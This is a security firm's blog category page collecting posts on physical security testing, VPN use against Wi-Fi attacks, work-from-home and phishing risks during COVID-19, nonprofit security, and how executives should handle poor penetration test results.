Category: Security Recommendations

  • Windows 10 Vulnerability Highlights Need for Physical Security Testing

    During our more advanced Red Team penetration testing attacks, Raxis customers are often shocked to discover that we’ve not only been inside their network, but we’ve also been inside their buildings, their server rooms, and even their individual offices. It would take days to explain all the tricks and techniques we use to do that, so let’s focus on the more important question of why we do it.

    The simple answer is that physical access to devices opens up a world of possibilities to an attacker. In fact a recent Forbes article about a Windows 10 security problem offers an excellent example of what can happen when a bad guy gets to spend a few minutes alone with your computer.

    Notice in the article that Bjorn Ruytenberg says that a hacker with the right equipment needs less than five minutes of access to exploit the Windows 10 vulnerability… even if the computer is not on. The attacker only needs physical access to the device. This is an important finding because 95% of the time when Raxis conducts a physical, social-engineering assessment, we succeed in gaining unchallenged physical access to facilities and devices – even when armed guards are employed. Security is often perception, and our techniques commonly bypass guards, electronic devices, and employees. We often find unmanned workstations and usually find ourselves with these devices for far longer than the 5 minutes that Ruytenberg says it takes.

    What’s the takeaway? In the real world, cybersecurity must complement physical security. In other words, patch your Windows but don’t forget to lock your windows as well.

  • Notes From a Hacker: Yes, You Have to Use Your VPN – and Here’s Why

    Right now, across the globe, there are millions of exasperated IT helpdesk workers on the phone with an equal number of frustrated colleagues who are working from home, some for the very first time. I don’t have exact numbers, but I’m willing to bet that the most common issue they’re discussing is problems logging onto a company’s virtual private network (VPN). From my own experience, at least some of those end users (maybe you included) are asking, “Do we really have to do this?” 

    The answer is, yes, you do. And, because your IT team is likely overwhelmed right now, I’ll step in and share just a few reasons why a VPN helps keep your company safe from people like me.

    The most common threat someone faces on unsecured WiFi networks is a man-in-the-middle (MitM) attack, where a hacker inserts himself into the data stream between two endpoints. You’ve probably been cautioned about public WiFi – coffee shops, airports, etc. – for that very reason.  Trust me, it will work on your home as well.

    A successful MitM attack allows a bad guy to intercept or modify data in transit, including credentials or financial information. In fact, most wireless attacks are perpetrated with the goal of acquiring MitM access to user data. A VPN connection encrypts your data and makes it much harder for a hacker to steal.

    MitM is similar to another threat known as the “Evil Twin” attack. This is sometimes referred to a rogue access point that exploits how wireless endpoints behave. When a phone, laptop, or tablet joins a wireless network, it will remember that connection. From that point forward, the endpoint will send out beacons looking for that network.

    Unfortunately for you, it’s easier than you think to trick your devices. We can use tools such as Mana or the WiFi Pineapple to respond to create a fake access point. Your device will associate with it as though it was the legitimate network. From there we have a MitM and can intercept or modify data in flight, or even create fake captive portals to capture credentials.  

    Other tools help attackers go after wireless networks directly by sending de-authentication packets, which cause devices to disconnect. When they attempt to reconnect to the network, they must re-authenticate. This process involves a four-way handshake in which a hashed form of the Pre-shared Key (PSK) is exchanged. A hacker can capture this handshake and attempt to crack it offline using tools such as Hashcat. If the hash is cracked, the PSK is revealed in cleartext.

    The most widely used is the Aircrack-ng suite of tools which includes Airmon-ng for capturing wireless traffic, Aireplay for injecting wireless packets, and Aircrack for cracking the PSK. Other tools such as WiFite offer a menu-driven interface that automates a wide variety of attacks.

    You may be thinking these tools are rare and hard to find, but that’s not the case. Both hardware and software are readily available and relatively cheap. They’re also very simple to set up and operate. 

    My point is that it can be relatively easy for a hacker to compromise your home WiFi. By contrast, your IT security team has a number of safeguards in place to protect you and the company’s network from the tools and tactics I described above. Extending that protection to those working remotely is the reason you have to use your VPN.

    Does that mean you can’t be hacked? Certainly not. But it does make my job a lot harder and it probably will cause me to move on – to another employee, another method of attack, or best case, another company.

    Preferably one that doesn’t use a VPN for remote workers.

     

  • Raxis COO Shares WFH Cybersecurity Tips on Columbus, Ohio’s Fox 28

    “Protect your data in the same way you protect your health.” That’s the main message our own Bonnie Smyre delivered today in an interview on Good Day Marketplace, a popular television show in the Columbus, Ohio area.

    Raxis COO, Bonnie Smyre, on Good Day Marketplace

    Bonnie explained to host Shawn Ireland and her audience that hackers and scammers know that Americans are worried about COVID-19 and are hungry for reliable information now. That’s why it’s important to only visit sites you know are safe and never click links inside unsolicited emails. She also talked about the importance of keeping personal information off your work devices.

    Bonnie cautioned that, even though slow Internet speeds can be frustrating, don’t disable spam and virus filtering or endpoint protection in hopes of speeding things up.

    Check out Bonnie’s full interview below here: https://myfox28columbus.com/sponsored/good-day-marketplace/gdm-raxis-information-security

  • Remote Security Series: Protect Your Network Health Like Your Own

    Most of us understand by now (hopefully) that this COVID-19 emergency is not the time to take chances with our health and safety. The benefits of being disease free far outweigh the costs of some social distancing and extra diligence about hygiene. However, I’m worried that many companies don’t seem to make the connection between what they’re doing to protect their employees and what they should be doing to protect their data.

    That’s dangerous because hackers are heartless. In their world, COVID-19 doesn’t bring suffering and death; to them, it’s all about opportunity and wealth. Like a virus, they’re attacking the most vulnerable and leaving untold damage in their wake.

    Unfortunately, we’ve seen and heard about companies across America that are making hackers’ jobs easier. For example, the additional strain of accommodating remote workers has caused many IT departments to open ports and grant access that they would never allow normally.

    RDP, VPN, oh my!

    One common problem is companies opening remote desktop protocol (RDP) access, which can be easily exploited. Others have VPN configuration errors that slow network traffic, frustrate users, and put pressure on IT staff to relax security measures in order to improve productivity. And some are not monitoring network traffic, which can open the door to brute force attacks. Raxis is seeing this firsthand in many of our external and remote internal penetration tests we are currently conducting for our customers.

    Add to this the challenge of team members accessing the network with their home devices. Each one brings with it a high degree of risk that most office-based IT teams aren’t accustomed to managing at scale.

    The bad guys know all this, of course. That’s why we’ve seen a surge of attacks, many based on the COVID-19 emergency itself. Scammers know we’re scared, tired, and worried for ourselves and our loved ones. We’re more likely to click on a malicious link or reveal sensitive information – and less likely to have appropriate safeguards in place when we do.

    Where to start

    So, what’s the solution? Our previous posts in this series have talked about ways to make networks more resilient from a technological perspective. But this is also a time when IT pros have a responsibility to safeguard their companies infrastructure and protect their employees. It’s up to you to make sure that productivity doesn’t come at the expense of security, even if that isn’t what your C-suite leaders or colleagues want to hear right now.

    The good news is that you don’t have to go it alone. Raxis experts can help you discover and document any unintended security consequences that come from your team working remotely. We can provide a fresh, hacker’s-eye evaluation of your perimeter defenses along with continual assessments to make sure they remain effective. We also offer many remote solutions that go hand in hand with the new workplace guidelines for many of our customers.

    Just as the coronavirus has made us more careful about our physical health, the resulting work-from-home experience should make us much more conscious of our cybersecurity posture. Give us a call and let’s talk about how Raxis can help you emerge from this crisis more secure and more confident about working remotely.

    Contact Raxis for more information.

    Want to learn more? Take a look at the first part of our Remote Security Series.

  • Remote Security Series: Urgent Questions You’ll Face About VPN and Remote Access

     As the coronavirus has pushed almost all of the workforce remote, IT teams have been very busy making networks accessible in ways they weren’t previously. Most organizations plan for a consistent number of users remotely accessing the network. I doubt any planned for a nearly global work-from-home (WFH) event like COVID-19. 

    As a result, I’ve worked with a few companies to help implement some very last-minute WFH solutions. I came away with a better understanding that there are some critical questions companies need to be asking (and answering) right now. 

    Do you have enough VPN licenses? Imagine being told on a Friday afternoon that everyone will be working from home for the foreseeable future. One company’s VPN was licensed for 100 users but had over 250 working remotely. Their immediate answer was to open up remote desktop ports for each user’s office computer. Bad idea, especially considering a few passwords were very insecure, including “Winter2020!” and “Corona2020$.” 

    Do you have enough bandwidth? Like VPN licenses, most companies have plenty of bandwidth to handle office data and the normal load of remote users with no issues. But with everyone working from home and many streaming media, this can cause a lot of strain on your network and lead to performance issues and outages.  

    Is split tunneling appropriate for your company? In many cases, split tunneling is a great way to address the bandwidth issue. However, you lose some encryption as you now have only certain applications and network traffic going back through the encrypted VPN. This can lead to data being mishandled, so make sure you have safeguards in place to prevent that. Also, it’s a good idea to block streaming services through the VPN tunnel or on an endpoint protection product. 

    Are your users trained to use the VPN? With the rush to get users setup, users who worked in the office every day are now trying to do the same type of work from home. This may be painfully slow if they are accustomed to 1000 Mbps in the office and get only 50 Mbps at home. Their fix will be to download files locally, work on them, and then upload them back when done (we hope). That raises a couple of other important questions…

    Do they delete sensitive data from their computers when they are done?  Do they even know they should do this? If there’s even a speck of doubt, I strongly recommend putting data loss prevention (DLP) tools on the endpoints to ensure data isn’t leaving the network unsecured.

    Do you have a ‘shadow IT’ problem you didn’t know about? Here’s an interesting issue I ran into recently: A company realized there were employees who had been working remotely for years, but who didn’t know how to use the VPN to access files they need on a daily basis. I decided they either have integrity challenges, or they have unauthorized side channels they may not know about. Let’s set aside the ethics issue and assume you suspect the latter. Now would be a good time to start monitoring traffic going out to popular file sharing services. In an incident response situation, these services create more areas to audit, and your price tag and scope just increased a lot. Imagine thinking you have 10 servers and 400 workstations to check and then adding every Dropbox, Box.net, Sync and OneDrive account and folder. 

    Is your VPN network being monitored or logged? How many concurrent connections are allowed per user? This is important if a user is compromised and you allow unlimited connections per user. A malicious person can be connected to your network and it may go unnoticed. That’s why you should enforce MFA on your remote access solution.

    Are user endpoints encrypted and patched? Your end users are now working on networks with potential default passwords and weak wireless security, which you probably can’t control. It is very important then that you harden as much as you possibly can control.  Once your WFH solutions are in place, make sure you remember to audit their security. Don’t let a rush to get users working remotely lead to costly misconfigurations and data breaches — just because they click a malicious COVID-19 update or decide to watch cat videos.

    Does your business continuity plan reflect the new reality? Remote access to critical data should be a part of your business continuity plan. Being surprised by a hard limit of users on your VPN appliance can lead to a rush to provide accessibility, which in turn can lead to bad security decisions. Testing this plan will also show you areas that need to be addressed or that would be much easier to handle if you had known ahead of time. Also, ensure you have an updated remote access and VPN policy in place. Your end users will not always make smart security decisions, so ensure that they have a document to reference.

     The coronavirus emergency is putting all of us to the test, but especially the IT teams who shoulder the responsibility for keeping a remote workforce secure and productive. Make sure you have good answers to these questions and, if you need help, remember we are here for you.

     Raxis is always happy to discuss your unique circumstances and to offer options specific for your needs as well as your budget.

    Contact Raxis for more information.

     Want to learn more? Take a look at the next part of our Remote Security Series.

  • Remote Security Series: Review Remote Workforce Policies

    The coronavirus emergency has made it clear that some companies are ready for the new work-from-home (WFH) reality, with mature and tested policies for managing remote business workflows. Others were caught off-guard and now find themselves developing and refining their procedures even as they’re being implemented.

    Especially in times of crisis, we humans need structure, boundaries, and clear guidance to help us feel secure and remain productive. So much so that we’ll create our own in the absence of any guidance. And while a little flexibility is a good thing, remote work brings technology and cybersecurity challenges that demand clear, relevant, and effective policies to protect the company’s network.

    Turning the problem into an opportunity

    Though most companies are now facing the radical shift to a remote workforce, the smart ones are using this emergency as an opportunity to review and update their remote work policies. Even for those that have transitioned smoothly to WFH, the scale of this change makes it prudent to double check the security posture of their teams. Those that do will find more ways to make their operations more secure and efficient; those that don’t may become corporate casualties of the coronavirus.

    Safeguarding sensitive data

    One of the biggest security issues for businesses is handling sensitive data like Social Security, credit card, or bank account numbers. Do you have procedures in place to make sure that information can be sent and received securely? Take a close look at how sensitive data flows across your newly extended network boundaries. Make sure you’ve accounted for identity management, client information, and any type of financial divulgence or payment.

    Like a rubber band, your network perimeter thins as it expands. Remote workers are at a heightened risk of direct attacks against their personal data. Emphasize the importance of documented policies regarding internal communications. Some examples might include never asking for passwords, verifying critical or sensitive requests, and MFA support.

    Business continuity processes (you do have them, don’t you?) no longer enjoy the luxury of encompassing a small number of sites. They now must accommodate an increasingly dynamic footprint of inputs from remote workers. Use this experience to update them to include such things as better internal communications, more productivity checkpoints, remote device wipe, and alternate contact information for remote workers.

    Include guidance about the personal use of business assets and make sure your VPN enforces a minimum level of security compliance before authorizing network connections. That should include requiring the use of company devices, keeping your endpoint protection up to date, and making sure any necessary agents are installed.

    In addition, you should enforce MFA on all systems that connect to network resources. Implementing MFA requires planning, but it offers much more robust security at the perimeters.

    All of these efforts are important, but they’re doomed unless you also have an effective way to let your workers know about them. Now is the time to communicate more frequently about security and be on guard against localized attacks like phishing and spear-phishing. Not sure about that email? Don’t open it. Hold off on sending hyperlinks so that any links received stand out for additional scrutiny.

    Where to start

    These are just a few of the ways you can make sure your business turns the problems you face with remote work into opportunities to make the experience more effective for your company and your team.

    If you need more help or want experts to help you transition to WFH, Raxis offers thorough security reviews and guidance on Teleworking, Security, and Business Continuity / Disaster Recovery (BC/DR) policies.

    Contact Raxis today for more information.

    Want to learn more? Take a look at the next part of our Remote Security Series.

  • Remote Security Series: Stay ahead of the phishing attacks that follow COVID-19

    In these uncertain times, many companies are allowing employees to work from home more than ever before. Essential personnel onsite at the workplace are kept to a minimum and are offered remote support when issues occur. The scope of remote work is unprecedented and brings up a lot of questions for managers aiming to support their employees.

    This series will discuss security testing and consulting options that Raxis offers to help companies work as securely as possible while employees work from home using home wireless services and systems or jump on the company VPN in unprecedented numbers.

    Phishing

    Raxis expects a rise in phishing attempts — emails, texts & phone calls — as attackers realize that employees are at home and not as easily able to verify that requests are legitimate.

    Let’s start with your VPN itself. It’s likely at least a few of your team members are going to have problems logging on. Though they may be overwhelmed, your help desk workers are inclined to be helpful. Verification is a step that might easily be skipped in a rush to get an exec or senior manager online.

    Finance is another point of vulnerability. Say that you receive an email from your boss saying to approve a new vendor payment. Normally your boss would never send that in an email . . . but these are not normal times, and you’re both working from home. You think of giving her a call, but she just told you she’s busy setting up her children’s new online school meeting. Do you approve the request? How are you sure that it’s legitimate?

    What if it was a phone request from a customer who is working from home? He’s on his cell phone. Are you sure it’s really him? Should you verify before telling him customer financial information? Sure you should, but you’re out of your normal environment and he sounds really annoyed. What do you do?

    And what about your teammates? Your employee texts you and asks for the password to an old system with a shared password. Do you text them back? Do you check the number first? Send it in email?

    These are different questions than you ask when you’re in the office and can lean over the cube wall. It pays to make sure all your employees know the answers (or at least ask the questions) before they face them in the real world from home.

    Where to start

    Raxis has a number of phishing tests that fit these scenarios, and we are happy to work with you to customize a test that fits your needs. We provide a report and a debriefing call to help you educate your employees with real world examples. Whether they pass or fail, it’s an opportunity to safely assess their readiness and reinforce their training.

    Take a look at our social engineering offerings. As always, Raxis is happy to advise you and work with you to customize a test that meets your needs. If you have concerns, we’d be happy to chat with you about options that work for you.

    Contact Raxis today for more information.

    Want to learn more? Take a look at the next part of our Remote Security Series.

  • Helping Nonprofits and Other Growing Businesses Understand Security Risks

    I’m excited that NTEN, the Nonprofit Technology Network with more than 50,000 community members, invited me to be a guest blogger this week.

    It’s important that nonprofits avoid the mindset that leaves so many businesses vulnerable. Specifically, I’m talking about the idea that they are too small or have too little money to be of interest to scammers, hackers, and other cyber criminals. The truth is that the bad guys often don’t discriminate, and you may have something they want more than money.

    For example, if you keep detailed donor records, that personally identifiable information (PII) might be devastating in the wrong hands. A skilled hacker or social engineer can do a lot with names, email addresses, and phone numbers alone. Add in Social Security numbers or bank account information, and you may be sitting on a gold mine for a malicious actor.

    Some of today’s most serious threats are driven by political goals more than financial interests. In many cases, these are well-financed state-sponsored attacks, and your organization may have data that can help them breach a government agency’s security or social engineer their way into a large corporation.

    And forget about hackers leaving you alone because of your mission. After my years in the cybersecurity sector, I’m no longer shocked at how low some of these black hats will go. We’ve seen hospitals and health care organizations, charities, churches, schools, and other do-good groups fall prey.

    The saddest part is knowing that some of these attacks were successful for the very reasons the organizations thought they would never happen. To a hacker, the idea that you’re too small to notice may mean they see you as an easy target, even if you’re only one step toward their larger goal.

    If you’re a nonprofit leader, board member, or even a volunteer, please take a moment to check out the article above. You may find some nuggets that will help you help your organization avoid a breach. And that may be the most important contribution you can make to your favorite cause.

  • Top Five Actions NOT to Take When Your Pentest Results are High Risk

    Monday Morning Voicemail:

    Good morning high-powered CSO, this is Brian with Raxis. I sent over a draft of the most recent assessment report as you requested. Just to recap, there were seven critical findings, 5 severe, and a menagerie of others that we can discuss at your convenience.

    You’re the CSO of a major enterprise. You’ve hired us to perform a penetration test, and the results aren’t pretty.  What now?The team at Raxis brings a rich depth of experience in articulating risk to all audiences. We can talk technical with the engineering groups and discuss strategy with C-level executives. It’s how someone deals with adversity that defines them as a leader. We’ve seen leaders emerge from the fire to rise above the fray. We’ve also witnessed the fallout when leadership decisions are made in ignorance or for political expediency.A security assessment is only one step in a process, and its value is largely determined by what happens after we’re out of the fray, so to speak.  So, there you are; you have an unexpectedly thick and verbose penetration test report sitting in your inbox. Here are the 5 worst things you can do, based on what we’ve seen happen in the real world.

    5. Sweep it Under the Rug

    It may be tempting to just quietly file that report away because you think it might tarnish your reputation or because, “that only happens to other companies.” Maybe you would prefer to fix the findings with minimal political overhead. Here’s the problem. The report you received is a bona-fide disclosure of risk. When it landed in your inbox, all level of plausible deniability left the building. If you do anything less than boldly embrace it, and the company is breached, you are going to be in a rough spot with tough questions to answer. By owning the problem, you can own the resolution. Let that be the focus.

    4. Play the “Blame Game”

    It is easy in the world of corporate culture to get bogged down in political maneuvering.  A corporate leadership role requires a certain level of posturing, but there are few things less productive than finger pointing. The fact that you were against rolling out the vulnerable application or platform that was compromised may carry weight in your inner circle of colleagues, but your stockholders only want to know their investment has underlying value and that effective leadership is at the helm. It’s helpful to acknowledge mistakes and learn from them, but keep the emphasis on moving forward.

    3. Cling to Penny Wise and Pound Foolish Remediations

    The findings in the assessment report are not a checklist to be ticked off and call it a day. Yes, of course they should be fixed, but it’s critical to understand that a penetration test is opportunistic. The findings that are presented are probably not the only significant exposure. Look at the bigger story that they tell and formulate remediations at a systemic level. Were all the findings related to applications?  If so, the problem probably is not the applications but more likely with their development and deployment. Yes, fix the symptom, but do not neglect the underlying problems that led to it.

    2. Rain Down Fire and Wrath

    We see this far too often. A phishing email is sent out, and an employee clicks on the link, which then becomes the bridgehead for a compromise. When the report is delivered, specific individuals are identified as the source of the compromise and are promptly fired. That is absolutely the wrong course of action. Look at it this way. Once they understand the ramifications of their action, that person is the most secure person in the company at that moment. It’s likely that they will continue to operate under a heightened level of vigilance and will be the last person to click on a suspicious link in the future. Replacing them with someone who has not learned that lesson, simply presses the reset button for future phishing attacks. Help them understand the attack and how their actions contributed, and they may become a power advocate among their peers for better security.

    1. Silo Solutions

    Would a capable attacker limit themselves to a single application, network, or technology?   The answer, of course, is that they would not. Lateral movement is a huge component of privilege escalation.  It’s important to scrutinize specific elements of any environment. We conduct assessments regularly against a single application or system, but what we always try to underscore is that rarely are attacks vertical. Rather, the attack chain tends to zigzag across technologies and business units within an organization. Just because you tested and remediated a specific web application does not mean that the app no longer presents a risk. It means that the direct exposure created by the app has been mitigated. Maybe there is another vulnerable application running on the same server that can be used as a point of compromise?The point is that attackers do not silo their efforts, so don’t silo your defenses.

    Your Decisions Make the Difference

    Fortunately, these observations are more the exceptions than the rule, but they do happen. And they happen in surprising large and mature organizations. Most of these mistakes can be attributed to a knee-jerk moment of self-preservation. When our lizard brain steps in, sometimes we don’t make the best decisions for our career.The best way to avoid these pitfalls is to never put yourself in that situation in the first place. Yes, some pentests are horrific. In leadership, it’s not how you fall.  It’s how you rise above.

    A security assessment is not a chance for someone to make you look bad. It’s a learning exercise. Embrace it and use it for a platform from which to build positive change..

    Raxis CTO, Brian Tant